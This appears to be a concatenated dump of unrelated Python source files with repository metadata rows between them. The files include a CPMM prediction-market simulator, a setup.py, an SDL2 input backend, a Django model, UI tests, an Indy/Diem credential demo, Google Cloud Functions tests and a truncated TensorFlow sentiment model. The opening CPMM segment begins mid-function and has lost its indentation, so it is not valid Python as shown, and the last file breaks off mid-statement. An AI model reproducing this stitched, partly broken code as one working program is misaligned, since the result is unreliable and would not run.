type = 1 if yes_to_no >= 1 else 0
if type:
# more into YES bucket, NO is returned
old_lp_no = self.lp_no
self.lp_no = (amount + self.lp_yes) / yes_to_no
self.lp_yes += amount
tokens_return = amount + old_lp_no - self.lp_no
self.outstanding_no += tokens_return
else:
# more into NO bucket, YES is returned
old_lp_yes = self.lp_yes
self.lp_yes = (amount + self.lp_no) * yes_to_no
self.lp_no += amount
tokens_return = amount + old_lp_yes - self.lp_yes
self.outstanding_yes += tokens_return
entry = ["add", "liquidity", amount, 0, yes_to_no, 0, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0 ,0]
self._add_history(entry)
# should return amount of outcome token
return (type, amount)
# def remove_liquidity(amount):
def buy_token(self, type, original_amount) -> Tuple[int, float]: #yes=1 | no = 0
# take fee before any operation and store in fee_pool
fee = original_amount * self.fee_fraction
amount = original_amount - fee
self.fee_pool += fee
# adding fee_to_liquidity fraction to liquidity fee pool
# note: liquidity is provided before buy such that added liquidity is available for current transaction
if (self.fee_to_liquidity_fraction > 0):
reinvest_fee = fee * self.fee_to_liquidity_fraction
self.add_liquidity(reinvest_fee)
# keep invariant
k = (self.lp_yes * self.lp_no)
# add liquidity
self.lp_token += amount
if type:
tokens_return, x = self.calc_buy(type, amount)
buy_price_yes = amount / tokens_return
# calc slippage
slippage_yes = self.calc_slippage(type, amount)
assert (slippage_yes > 0), f"slippage_yes {slippage_yes} <= 0"
# remove returned token form the pool, keep all no tokens
self.lp_yes += x
self.lp_no += amount
entry = ["buy", "yes", original_amount, fee, buy_price_yes, slippage_yes, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0, 0]
else:
tokens_return, x = self.calc_buy(type, amount)
buy_price_no = amount / tokens_return
slippage_no = self.calc_slippage(type, amount)
assert (slippage_no > 0), f"slippage_no {slippage_no} <= 0"
# remove returned token form the pool, keep all yes tokens
self.lp_no += x
self.lp_yes += amount
entry = ["buy", "no", original_amount, fee, buy_price_no, slippage_no, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0, 0]
# assert invariant, we use float and disregard rounding so must be within e ~ 0
inv_div = abs(k - (self.lp_yes * self.lp_no))
# use variable epsilon - float numbers suck due to scaling
inv_eps = min(self.lp_no, self.lp_yes) / 100000000
if inv_div > inv_eps :
print(f"invariant K {k} {self.lp_yes * self.lp_no} == {inv_div}, lp_yes {self.lp_yes} lp_no {self.lp_no} eps {inv_eps}")
assert(inv_div < inv_eps)
impermanent_loss = self.calc_impermanent_loss()
assert(impermanent_loss >= 0)
# outstanding yes/no token may be converted at event outcome to reward or immediately traded
outstanding_token = self.calc_outstanding_token()
# impermanent loss at last position in history entry
entry[-2] = impermanent_loss
entry[-1] = outstanding_token[1]
self._add_history(entry)
return (type, tokens_return)
def calc_withdrawable_liquidity(self) -> float:
# collateral taken from the pool and tokens returned when adding liquidity
return min(self.lp_yes + self.outstanding_yes, self.lp_no + self.outstanding_no)
def calc_payout(self) -> float:
# how big is reward after all liquidity is removed
return self.lp_token - self.calc_withdrawable_liquidity()
def calc_outstanding_token(self) -> Tuple[int, float]:
# outcome tokens going to LP on top of removed liquidity
withdraw_token = self.calc_withdrawable_liquidity()
total_yes = self.lp_yes + self.outstanding_yes
total_no = self.lp_no + self.outstanding_no
if total_yes > total_no:
outstanding_token = (1, total_yes - withdraw_token)
else:
outstanding_token = (0, total_no - withdraw_token)
return outstanding_token
def calc_impermanent_loss(self) -> float:
withdraw_token = self.calc_withdrawable_liquidity()
return self.liquidity - withdraw_token
def calc_buy(self, type, amount) -> Tuple[float, float]:
k = (self.lp_yes * self.lp_no)
if type:
x = k / (self.lp_no + amount) - self.lp_yes
else:
x = k / (self.lp_yes + amount) - self.lp_no
# (tokens returned to the user, amm pool delta)
return amount - x, x
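    # Worked example (added for illustration): with lp_yes = lp_no = 1000 the
    # invariant is k = 1_000_000, and calc_buy(1, 100) gives
    # x = 1_000_000 / 1100 - 1000 ≈ -90.91, so the buyer receives
    # 100 - x ≈ 190.91 YES tokens; buy_token then leaves lp_yes ≈ 909.09 and
    # lp_no = 1100, preserving lp_yes * lp_no ≈ k.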
def calc_marginal_price(self, type) -> float:
pool_total = (self.lp_no + self.lp_yes)
return (self.lp_no if type else self.lp_yes) / pool_total
def calc_slippage(self, type, amount) -> float:
tokens_return, _ = self.calc_buy(type, amount)
buy_price = amount / tokens_return
marginal_price = self.calc_marginal_price(type)
return (buy_price - marginal_price) / buy_price
@staticmethod
def calc_british_odds(returned_tokens, amount) -> float:
# british odds https://www.investopedia.com/articles/investing/042115/betting-basics-fractional-decimal-american-moneyline-odds.asp
# shows the reward on top of stake as a decimal fraction to the stake
# (TODO: we could use Fraction class of python for nice odds representation)
        # may be negative due to cpmm inefficiencies
return (returned_tokens - amount) / amount
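        # Worked example (added): a stake of 100 returning ~190.91 tokens gives
        # odds of (190.91 - 100) / 100 ≈ 0.91, i.e. roughly 10/11 in fractional
        # terms.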
# def sell_token(type, amount):
# def get_buy_price_yes():
# def get_sell_price_yes():
_csv_headers = [
"activity", "type", "amount", "fee", "token_buy_sell_price",
"slippage", "returned tokens", "lp_yes", "lp_no", "lp_token",
"liquidity", "fee_pool", "impermanent_loss", "loss_outstanding_tokens"
]
@property
def history_as_dataframe(self) -> pd.DataFrame:
return pd.DataFrame(data=self.history, columns=CPMM._csv_headers)
def save_history(self, name) -> None:
df = self.history_as_dataframe
with open(name, "wt") as f:
df.to_csv(f, index=False, quoting=csv.QUOTE_NONNUMERIC)
def _add_history(self, entry) -> None:
# check entry size
assert(len(entry) == len(CPMM._csv_headers))
self.history.append(entry)
def run_experiment(name, cpmm: CPMM, n, prior_dist, betting_dist):
# TODO: must have realistic model for betting behavior, for example
# total bets volume cannot cross % of liquidity
# individual bet cannot have slippage > 1% etc.
bet_outcomes = prior_dist(n)
bet_amounts = betting_dist(n)
print(f"{name}: bet outcomes N/Y {np.bincount(bet_outcomes)}")
for b, amount in zip(bet_outcomes, bet_amounts):
cpmm.buy_token(b, amount)
# print(cpmm.history)
cpmm.save_history(f"{name}.csv")
def main():
rng = default_rng()
# experiment 1
    # 1000 rounds, initial liquidity 50:50 1000 EVNT, bettors prior 50:50, bets integer uniform range [1, 100]
cpmm = CPMM()
cpmm.create_event(1000)
run_experiment(
"experiment1",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 2
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 70:30, bets integer uniform range [1, 100]
cpmm = CPMM()
cpmm.create_event(1000)
run_experiment(
"experiment2",
cpmm,
1000,
lambda size: rng.binomial(1, 0.7, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 3
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 70:30, bets integer uniform range [1, 100]
# fee 2% taken and not added to liquidity pool
cpmm = CPMM(fee_fraction=0.02)
cpmm.create_event(1000)
run_experiment(
"experiment3",
cpmm,
1000,
lambda size: rng.binomial(1, 0.7, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 4
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 50:50, bets integer uniform range [1, 100]
# fee 2% taken and 50% added to liquidity pool
cpmm = CPMM(fee_fraction=0.02, fee_to_liquidity_fraction=0.5)
cpmm.create_event(1000)
run_experiment(
"experiment4",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
    # experiment 5
    # 1000 rounds, betters prior 50:50, bets integer uniform range [1, 100]
    # fee 2% taken and 50% added to liquidity pool
    # TODO: this run was meant to start from a skewed 1:3 liquidity split of
    # 1000 EVNT, but create_event(1000) below seeds the pool 50:50 exactly as
    # in experiment 4.
cpmm = CPMM(fee_fraction=0.02, fee_to_liquidity_fraction=0.5)
cpmm.create_event(1000)
run_experiment(
"experiment5",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
if __name__ == "__main__":
main()
| 32.455385 | 168 | 0.724877 | 7,761 | 0.735779 | 0 | 0 | 579 | 0.054892 | 0 | 0 | 3,685 | 0.349355 |
9ebc76ad7fb2ab59ef2ca50b8282c5e6935d4d06 | 1,184 | py | Python | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| 5 | 2015-03-18T01:19:56.000Z | 2020-10-23T12:44:47.000Z | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| null | null | null | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| null | null | null | """
rave input backend using the SDL2 library.
"""
import sys
import sdl2
import rave.log
import rave.events
import rave.backends
from ..common import events_for
from . import keyboard, mouse, touch, controller
BACKEND_PRIORITY = 50
## Module API.
def load():
rave.backends.register(rave.backends.BACKEND_INPUT, sys.modules[__name__])
def unload():
rave.backends.remove(rave.backends.BACKEND_INPUT, sys.modules[__name__])
sdl2.SDL_QuitSubSystem(sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_HAPTIC | sdl2.SDL_INIT_GAMECONTROLLER)
def backend_load(category):
if sdl2.SDL_InitSubSystem(sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_HAPTIC | sdl2.SDL_INIT_GAMECONTROLLER) != 0:
return False
return True
## Backend API.
def handle_events():
for ev in events_for('input'):
if keyboard.handle_event(ev):
pass
elif mouse.handle_event(ev):
pass
elif touch.handle_event(ev):
pass
elif controller.handle_event(ev):
pass
else:
_log.debug('Unknown input event ID: {}', ev.type)
rave.events.emit('input.dispatch')
## Internal API.
_log = rave.log.get(__name__)
| 22.769231 | 113 | 0.688345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 146 | 0.123311 |
9ebe258aa483e065cfc04b0e3ffeede0cfc9e13c | 862 | py | Python | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null |
try:
    from setuptools import setup, find_packages
except ImportError:
    from distutils.core import setup
    # distutils has no find_packages(); fall back to naming the package
    # explicitly (assumes the package directory is pyDownload, per the
    # entry point below).
    def find_packages():
        return ['pyDownload']
dependencies = ['docopt', 'termcolor', 'requests']
setup(
name = 'pyDownload',
version = '1.0.2',
description = 'CLI based download utility',
url = 'https://github.com/Dhruv-Jauhar/pyDownload',
author = 'Dhruv Jauhar',
author_email = '[email protected]',
license = 'MIT',
install_requires = dependencies,
packages = find_packages(),
entry_points = {
'console_scripts': ['pyd = pyDownload.main:start'],
},
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
#'Programming Language :: Python :: 3 :: Only',
'Topic :: Utilities'
)
)
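# After installation (e.g. `pip install .`), the entry point above exposes the
# tool as the console command `pyd`, wired to pyDownload.main:start.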
| 25.352941 | 53 | 0.682135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 485 | 0.562645 |
9ebfc8aff37fd8a9c5182bec54f14b5f742f7af5 | 792 | py | Python | todo/models.py | sanaullahaq/todo-API | fc4b3c46902ceae8b67d96195451dcfe404a2d48 | [
"MIT"
]
| 2 | 2020-10-28T05:00:06.000Z | 2020-10-28T05:05:35.000Z | todo/models.py | sanaullahaq/todo-API | fc4b3c46902ceae8b67d96195451dcfe404a2d48 | [
"MIT"
]
| 4 | 2021-03-30T14:09:51.000Z | 2021-06-10T20:04:28.000Z | todo/models.py | sanaullahaq/todo | afd05969b74326a72f3103f86a55225137f3faab | [
"MIT"
]
 | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class Todo(models.Model):
title = models.CharField(max_length=100)
memo = models.TextField(blank=True) # it can be left blank
created = models.DateTimeField(auto_now_add=True)
# this will automatically add date and time and the user can't edit this
dateCompleted = models.DateTimeField(null=True, blank=True)
    # null=True is needed in addition to blank=True here: blank=True only
    # relaxes form validation, while null=True lets the database store an
    # empty value for this DateTimeField; see the Django model field docs.
important = models.BooleanField(default=False)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
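# Hypothetical usage (not part of the original file): the uncompleted todos of
# a given user can be queried as
#   Todo.objects.filter(user=some_user, dateCompleted__isnull=True)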
| 39.6 | 115 | 0.738636 | 716 | 0.90404 | 0 | 0 | 0 | 0 | 0 | 0 | 307 | 0.387626 |
7b35640cc33e749326b0108e01c9308ac2c3ffda | 603 | py | Python | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
| null | null | null | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
| null | null | null | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
 | null | null | null |
class Stuff:
def __init__(self):
return
@staticmethod
def print_logo():
print '''
____ _
_ __ | _ \ ___ ___| |_ ___ _ __ ___
| '_ \| |_) / _ \/ __| __/ _ \| '__/ _ \\
| |_) | _ < __/\__ \ || (_) | | | __/
| .__/|_| \_\___||___/\__\___/|_| \___|
|_|
'''
class NotAFolder(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class NotAFile(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 19.451613 | 41 | 0.507463 | 596 | 0.988391 | 0 | 0 | 257 | 0.426202 | 0 | 0 | 207 | 0.343284 |
7b356af2edb34b8b508b0178b0361112e9713c32 | 558 | py | Python | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
| 1 | 2020-02-03T21:57:22.000Z | 2020-02-03T21:57:22.000Z | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
| null | null | null | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
 | 1 | 2021-04-08T12:55:28.000Z | 2021-04-08T12:55:28.000Z |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import time
import json
with open("coverage.json", "r") as file:
timestamp = str(int(time.time()))
data = json.load(file)["data"][0]
lines_covered = str(data["totals"]["lines"]["covered"])
lines_valid = str(data["totals"]["lines"]["count"])
with open("perf_summary.csv", "a") as f:
f.write(
timestamp
+ ","
+ lines_valid
+ ",Unit_Test_Coverage,0,0,0,"
+ lines_covered
+ ",0,0,0,0"
)
| 26.571429 | 59 | 0.594982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.413978 |
7b3573ace3d1c2705447c13d56f1be46ceaa32b4 | 1,063 | py | Python | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
| null | null | null | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
| null | null | null | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
 | null | null | null |
import pytest
import allure
from data.parameters import data_parameters
@allure.feature('UI TEST:open page')
def test_open_page(app):
    with allure.step('Open the calculator page'):
app.open_calculator_page()
assert '/calculator' in app.get_path_current_url()
@allure.feature('UI TEST: Check and calculate parameters')
@pytest.mark.parametrize('params', data_parameters, ids=[repr(x) for x in data_parameters])
def test_calculate(app, params):
    with allure.step('Select the parameters and click calculate'):
app.choose_account_type("Standard")
app.choose_instrument(params[0]['symbol'])
app.choose_lot(str(params[0]["lot"]))
app.choose_leverage(f"1:{params[0]['leverage']}")
app.get_calculate()
    with allure.step('Compute the margin and compare it with the value on the page'):
margin_ui = app.get_margin()
conversion_factor = app.get_conversion_factor(params[0])
        margin_calc = app.calculate_margin(params[0], conversion_factor)
assert margin_ui == margin_calc
| 39.37037 | 91 | 0.718721 | 0 | 0 | 0 | 0 | 1,095 | 0.9343 | 0 | 0 | 375 | 0.319966 |
7b3a31a3ced9da114ff604217cc00699fa473e8b | 6,383 | py | Python | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
| null | null | null | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
| 15 | 2021-08-17T15:31:07.000Z | 2021-09-20T15:11:59.000Z | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
 | null | null | null |
import asyncio
import json
import time
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from diem import AuthKey, testnet, utils
from indy import anoncreds, wallet
from indy import pool
from get_schema import get_schema
from diem_txn import create_diem_script, create_diem_raw_txn, sign_and_wait_diem_txn
from compress_decompress_cred_def import compress_cred_def, clean_up_cred_def_res, decompress_cred_def
from async_calls import create_master_secret, create_credential_offer, \
create_credential_req, create_credential, store_credential
PROTOCOL_VERSION = 2
CURRENCY = "XUS"
issuer = {
'did': 'NcYxiDXkpYi6ov5FcYDi1e',
'wallet_config': json.dumps({'id': 'issuer_wallet'}),
'wallet_credentials': json.dumps({'key': 'issuer_wallet_key'})
}
prover = {
'did': 'VsKV7grR1BUE29mG2Fm2kX',
'wallet_config': json.dumps({"id": "prover_wallet"}),
'wallet_credentials': json.dumps({"key": "issuer_wallet_key"})
}
verifier = {}
store = {}
async def create_schema():
# Set protocol version 2 to work with Indy Node 1.4
await pool.set_protocol_version(PROTOCOL_VERSION)
# 1. Create Issuer Wallet and Get Wallet Handle
await wallet.create_wallet(issuer['wallet_config'], issuer['wallet_credentials'])
issuer['wallet'] = await wallet.open_wallet(issuer['wallet_config'], issuer['wallet_credentials'])
# 2. Create Prover Wallet and Get Wallet Handle
await wallet.create_wallet(prover['wallet_config'], prover['wallet_credentials'])
prover['wallet'] = await wallet.open_wallet(prover['wallet_config'], prover['wallet_credentials'])
# 3. Issuer create Credential Schema
schema = {
'name': 'gvt',
'version': '1.0',
'attributes': '["age", "sex"]'
}
issuer['schema_id'], issuer['schema'] = await anoncreds.issuer_create_schema(issuer['did'], schema['name'],
schema['version'],
schema['attributes'])
store[issuer['schema_id']] = issuer['schema']
cred_def = {
'tag': 'cred_def_tag',
'type': 'CL',
'config': json.dumps({"support_revocation": False})
}
issuer['cred_def_id'], issuer['cred_def'] = await anoncreds.issuer_create_and_store_credential_def(
issuer['wallet'], issuer['did'], issuer['schema'], cred_def['tag'], cred_def['type'], cred_def['config'])
store[issuer['cred_def_id']] = issuer['cred_def']
time.sleep(1)
return issuer['schema'], issuer['cred_def']
loop = asyncio.get_event_loop()
schema_and_cred_def = loop.run_until_complete(create_schema())
# connect to testnet
client = testnet.create_client()
# generate private key for sender account
sender_private_key = Ed25519PrivateKey.generate()
# generate auth key for sender account
sender_auth_key = AuthKey.from_public_key(sender_private_key.public_key())
print(f"Generated sender address: {utils.account_address_hex(sender_auth_key.account_address())}")
# create sender account
faucet = testnet.Faucet(client)
testnet.Faucet.mint(faucet, sender_auth_key.hex(), 100000000, "XUS")
# get sender account
sender_account = client.get_account(sender_auth_key.account_address())
# generate private key for receiver account
receiver_private_key = Ed25519PrivateKey.generate()
# generate auth key for receiver account
receiver_auth_key = AuthKey.from_public_key(receiver_private_key.public_key())
print(f"Generated receiver address: {utils.account_address_hex(receiver_auth_key.account_address())}")
# create receiver account
faucet = testnet.Faucet(client)
faucet.mint(receiver_auth_key.hex(), 10000000, CURRENCY)
METADATA = str.encode(schema_and_cred_def[0])
# create script
script = create_diem_script(CURRENCY, receiver_auth_key, METADATA)
# create transaction
raw_transaction = create_diem_raw_txn(sender_auth_key, sender_account, script, CURRENCY)
sign_and_wait_diem_txn(sender_private_key, raw_transaction, client)
print("\nRetrieving SCHEMA from Diem ledger:\n")
schema = get_schema(utils.account_address_hex(sender_auth_key.account_address()), sender_account.sequence_number,
"https://testnet.diem.com/v1")
cred_def_dict = compress_cred_def(schema_and_cred_def)
METADATA_CRED_DEF = str.encode(str(cred_def_dict))
# create script
script = create_diem_script(CURRENCY, receiver_auth_key, METADATA_CRED_DEF)
# create transaction
raw_transaction = create_diem_raw_txn(sender_auth_key, sender_account, script, CURRENCY, 1)
sign_and_wait_diem_txn(sender_private_key, raw_transaction, client)
print("\nRetrieving CRE_DEF from Diem ledger:\n")
cred_def_res = get_schema(utils.account_address_hex(sender_auth_key.account_address()),
sender_account.sequence_number + 1,
"https://testnet.diem.com/v1")
filtered_cred_def = clean_up_cred_def_res(cred_def_res)
decomp_comp = decompress_cred_def(filtered_cred_def)
master_secret_id = loop.run_until_complete(create_master_secret(prover))
prover['master_secret_id'] = master_secret_id
print("\nmaster sectet id:" + master_secret_id)
cred_offer = loop.run_until_complete(create_credential_offer(issuer['wallet'], decomp_comp['id']))
# set some values
issuer['cred_offer'] = cred_offer
prover['cred_offer'] = issuer['cred_offer']
cred_offer = json.loads(prover['cred_offer'])
prover['cred_def_id'] = cred_offer['cred_def_id']
prover['schema_id'] = cred_offer['schema_id']
prover['cred_def'] = store[prover['cred_def_id']]
prover['schema'] = store[prover['schema_id']]
# create the credential request
prover['cred_req'], prover['cred_req_metadata'] = loop.run_until_complete(create_credential_req(prover))
prover['cred_values'] = json.dumps({
"sex": {"raw": "male", "encoded": "5944657099558967239210949258394887428692050081607692519917050011144233"},
"age": {"raw": "28", "encoded": "28"}
})
issuer['cred_values'] = prover['cred_values']
issuer['cred_req'] = prover['cred_req']
print("wallet:")
print(issuer['wallet'])
print("\ncred_offer:")
print(issuer['cred_offer'])
print("\ncred_req:")
print(issuer['cred_req'])
print("\ncred_values:")
print(issuer['cred_values'])
(cred_json, _, _) = loop.run_until_complete(create_credential(issuer))
prover['cred'] = cred_json
loop.run_until_complete(store_credential(prover))
 | 34.690217 | 116 | 0.734608 | 0 | 0 | 0 | 0 | 0 | 0 | 1,616 | 0.253172 | 2,043 | 0.320069 |
7b3a56677628b2dcca3ff0494700cfb7a0aa4b48 | 2,173 | py | Python | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
| 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
| 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
 | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z |
import pytest
from GoogleCloudFunctions import resolve_default_project_id, functions_list_command
@pytest.mark.parametrize('project, credentials_json, expected_output,expected_exception', [
("some-project-id", {"credentials_json": {"type": "service_account", "project_id": "some-project-id"}},
"some-project-id", None),
(None, {"credentials_json": {"type": "service_account", "project_id": "some-project-id"}}, "some-project-id", None),
("some-project-id", {"credentials_json": {"type": "service_account"}}, "some-project-id", None),
(None, {"credentials_json": {"type": "service_account"}}, None, SystemExit)
])
def test_resolve_default_project_id(project, credentials_json, expected_output, expected_exception):
credentials_json = credentials_json.get('credentials_json')
if expected_exception is None:
assert resolve_default_project_id(project, credentials_json) == expected_output
else:
with pytest.raises(SystemExit):
assert resolve_default_project_id(project, credentials_json) == expected_output
def test_format_parameters():
from GoogleCloudFunctions import format_parameters
parameters_to_check = "key:value , name: lastname, onemorekey : to test "
result = format_parameters(parameters_to_check)
assert result == '{"key": "value", "name": "lastname", "onemorekey": "to test"}'
bad_parameters = "oh:no,bad"
with pytest.raises(ValueError):
format_parameters(bad_parameters)
class GoogleClientMock:
def __init__(self, region='region', project='project', functions=None):
if functions is None:
functions = []
self.region = region
self.project = project
self.functions = functions
def functions_list(self, region, project_id):
return {'functions': self.functions}
def test_no_functions():
"""
Given:
- Google client without functions
When:
- Running functions-list command
Then:
- Ensure expected human readable response is returned
"""
client = GoogleClientMock()
hr, _, _ = functions_list_command(client, {})
assert hr == 'No functions found.'
| 36.830508 | 120 | 0.698113 | 347 | 0.159687 | 0 | 0 | 966 | 0.444547 | 0 | 0 | 751 | 0.345605 |
7b3b43938d892ce413a93aef4a822d3347566181 | 11,938 | py | Python | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
| 2 | 2019-11-06T22:57:42.000Z | 2019-11-24T04:00:21.000Z | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
| null | null | null | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
 | null | null | null |
import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
BATCH_SIZE = 128
MAX_WORDS_IN_REVIEW = 200 # Maximum length of a review to consider
EMBEDDING_SIZE = 50 # Dimensions for each word vector
stop_words = set({'ourselves', 'hers', 'between', 'yourself', 'again',
'there', 'about', 'once', 'during', 'out', 'very', 'having',
'with', 'they', 'own', 'an', 'be', 'some', 'for', 'do', 'its',
'yours', 'such', 'into', 'of', 'most', 'itself', 'other',
'off', 'is', 's', 'am', 'or', 'who', 'as', 'from', 'him',
'each', 'the', 'themselves', 'below', 'are', 'we',
'these', 'your', 'his', 'through', 'don', 'me', 'were',
'her', 'more', 'himself', 'this', 'down', 'should', 'our',
'their', 'while', 'above', 'both', 'up', 'to', 'ours', 'had',
'she', 'all', 'no', 'when', 'at', 'any', 'before', 'them',
'same', 'and', 'been', 'have', 'in', 'will', 'on', 'does',
'yourselves', 'then', 'that', 'because', 'what', 'over',
'why', 'so', 'can', 'did', 'not', 'now', 'under', 'he', 'you',
'herself', 'has', 'just', 'where', 'too', 'only', 'myself',
'which', 'those', 'i', 'after', 'few', 'whom', 't', 'being',
'if', 'theirs', 'my', 'against', 'a', 'by', 'doing', 'it',
'how', 'further', 'was', 'here', 'than',
'wouldn', 'shouldn', 'll', 'aren', 'isn', 'get'})
def preprocess(review):
"""
Apply preprocessing to a single review. You can do anything here that is manipulation
at a string level, e.g.
- removing stop words
- stripping/adding punctuation
- changing case
- word find/replace
RETURN: the preprocessed review in string form.
"""
"""
    input: the content of each training file, as a string ("\n" marks a newline)
    (used in the runner file, line 58)
    output: the review as a list of words.
    Note: remember to choose 100 words at random
"""
import re
page = r"<.*?>"
pieces_nopara = re.compile(page).sub("", review)
patten = r"\W+"
pieces = re.compile(patten).split(pieces_nopara)
piece = [p.lower() for p in pieces if p != '' and p.lower() not in stop_words and len(p) > 2]
processed_review = piece
return processed_review
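# Illustrative call (hypothetical input, not from the original file):
#   preprocess("<br />Great movie, the acting was superb!")
#   returns ['great', 'movie', 'acting', 'superb']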
def define_graph():
"""
Implement your model here. You will need to define placeholders, for the input and labels,
Note that the input is not strings of words, but the strings after the embedding lookup
has been applied (i.e. arrays of floats).
In all cases this code will be called by an unaltered runner.py. You should read this
file and ensure your code here is compatible.
Consult the assignment specification for details of which parts of the TF API are
permitted for use in this function.
You must return, in the following order, the placeholders/tensors for;
RETURNS: input, labels, optimizer, accuracy and loss
"""
"""
    training_data_embedded[exampleNum, :] holds one embedded review.
    input_data is a placeholder of size BATCH_SIZE x MAX_WORDS_IN_REVIEW x EMBEDDING_SIZE,
    labels is a placeholder,
    dropout_keep_prob is a placeholder,
    optimizer is an op built on the placeholders input_data, labels, dropout_keep_prob,
    Accuracy and loss are built on the placeholders input_data, labels
"""
lstm_hidden_unit = 256
learning_rate = 0.00023
training = tf.placeholder_with_default(False, shape = (), name="IsTraining")
dropout_keep_prob = tf.placeholder_with_default(0.6, shape=(), name='drop_rate')
with tf.name_scope("InputData"):
input_data = tf.placeholder(
tf.float32,
shape=(BATCH_SIZE, MAX_WORDS_IN_REVIEW, EMBEDDING_SIZE),
name="input_data"
)
with tf.name_scope("Labels"):
labels = tf.placeholder(tf.float32, shape=(BATCH_SIZE, 2), name="labels")
with tf.name_scope("BiRNN"):
LSTM_cell_fw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
LSTM_cell_bw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
LSTM_drop_fw = tf.nn.rnn_cell.DropoutWrapper(
cell = LSTM_cell_fw,
output_keep_prob = dropout_keep_prob
)
LSTM_drop_bw = tf.nn.rnn_cell.DropoutWrapper(
cell = LSTM_cell_bw,
output_keep_prob = dropout_keep_prob
)
(RNNout_fw, RNNout_bw), _ = tf.nn.bidirectional_dynamic_rnn(
